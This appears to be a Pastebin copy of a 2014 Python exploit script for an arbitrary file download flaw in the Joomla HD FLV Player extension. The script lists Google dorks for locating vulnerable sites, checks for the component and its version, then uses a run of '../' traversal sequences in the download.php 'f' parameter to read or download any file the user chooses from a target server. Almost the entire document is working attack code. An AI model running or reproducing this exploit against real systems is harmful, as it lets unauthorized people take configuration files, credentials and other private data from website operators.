Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- #
- # Exploit Title : Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
- #
- # Exploit Author : Claudio Viviani
- #
- # Vendor Homepage : http://www.hdflvplayer.net/
- #
- # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
- #
- # Dork google 1: inurl:/component/hdflvplayer/
- # Dork google 2: inurl:com_hdflvplayer
- #
- # Date : 2014-11-11
- #
- # Tested on : BackBox 3.x/4.x
- #
- # Info:
- # Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
- # The variable "f" is not sanitized.
- # Over 80.000 downloads (statistic reported on official site)
- #
- #
- # Video Demo: http://youtu.be/QvBTKFLBQ20
- #
- #
- # Http connection
- import urllib, urllib2
- # String manipulation
- import re
- # Time management
- import time
- # Args management
- import optparse
- # Error management
- import sys
- banner = """
- _______ __ ___ ___ ______
- | _ .-----.-----.--------| .---.-. | Y | _ \\
- |___| | _ | _ | | | _ | |. 1 |. | \\
- |. | |_____|_____|__|__|__|__|___._| |. _ |. | \\
- |: 1 | |: | |: 1 /
- |::.. . | |::.|:. |::.. . /
- `-------' `--- ---`------'
- _______ ___ ___ ___ _______ __
- | _ | | | Y | | _ | .---.-.--.--.-----.----.
- |. 1___|. | |. | | |. 1 | | _ | | | -__| _|
- |. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
- |: | |: 1 |: 1 | |: | |_____|
- |::.| |::.. . |\:.. ./ |::.|
- `---' `-------' `---' `---'
- <= 2.1.0.1 4rb1tr4ry F1l3 D0wnl04d
- Written by:
- Claudio Viviani
- http://www.homelab.it
- info@homelab.it
- homelabit@protonmail.ch
- https://www.facebook.com/homelabit
- https://twitter.com/homelabit
- https://plus.google.com/+HomelabIt1/
- https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
- """
- # Check url
- def checkurl(url):
- if url[:8] != "https://" and url[:7] != "http://":
- print('[X] You must insert http:// or https:// procotol')
- sys.exit(1)
- else:
- return url
- def checkcomponent(url,headers):
- try:
- req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
- sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
- print("")
- except urllib2.HTTPError:
- sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
- sys.exit(1)
- except urllib2.URLError:
- print '[X] Connection Error'
- def checkversion(url,headers):
- try:
- req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
- response = urllib2.urlopen(req).readlines()
- for line_version in response:
- if not line_version.find("<version>") == -1:
- VER = re.compile('>(.*?)<').search(line_version).group(1)
- sys.stdout.write("\r[+] Checking Version: "+str(VER))
- print("")
- except urllib2.HTTPError:
- sys.stdout.write("\r[+] Checking Version: Unknown")
- except urllib2.URLError:
- print("\n[X] Connection Error")
- sys.exit(1)
- def connection(url,headers,pathtrav):
- char = "../"
- bar = "#"
- s = ""
- barcount = ""
- for a in range(1,20):
- s += char
- barcount += bar
- sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
- sys.stdout.flush()
- try:
- req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
- response = urllib2.urlopen(req)
- content = response.read()
- if content != "" and not "failed to open stream" in content:
- print("\n[!] VULNERABLE")
- print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
- print("")
- print("[+] Do you want [D]ownload or [R]ead the file?")
- print("[+]")
- sys.stdout.write("\r[+] Please respond with 'D' or 'R': ")
- download = set(['d'])
- read = set(['r'])
- while True:
- choice = raw_input().lower()
- if choice in download:
- filedown = pathtrav.split('/')[-1]
- urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
- print("[!] DOWNLOADED!")
- print("[!] Check file: "+filedown)
- return True
- elif choice in read:
- print("")
- print content
- return True
- else:
- sys.stdout.write("\r[X] Please respond with 'D' or 'R': ")
- except urllib2.HTTPError:
- #print '[X] HTTP Error'
- pass
- except urllib2.URLError:
- print '\n[X] Connection Error'
- time.sleep(1)
- print("\n[X] File not found or fixed component :(")
- commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
- commandList.add_option('-t', '--target', action="store",
- help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
- )
- commandList.add_option('-f', '--file', action="store",
- help="Insert file to check",
- )
- options, remainder = commandList.parse_args()
- # Check args
- if not options.target or not options.file:
- print(banner)
- commandList.print_help()
- sys.exit(1)
- print(banner)
- url = checkurl(options.target)
- pathtrav = options.file
- headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}
- sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
- checkcomponent(url,headers)
- sys.stdout.write("\r[+] Checking Version: ")
- checkversion(url,headers)
- sys.stdout.write("\r[+] Exploiting...please wait:")
- connection(url,headers,pathtrav)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement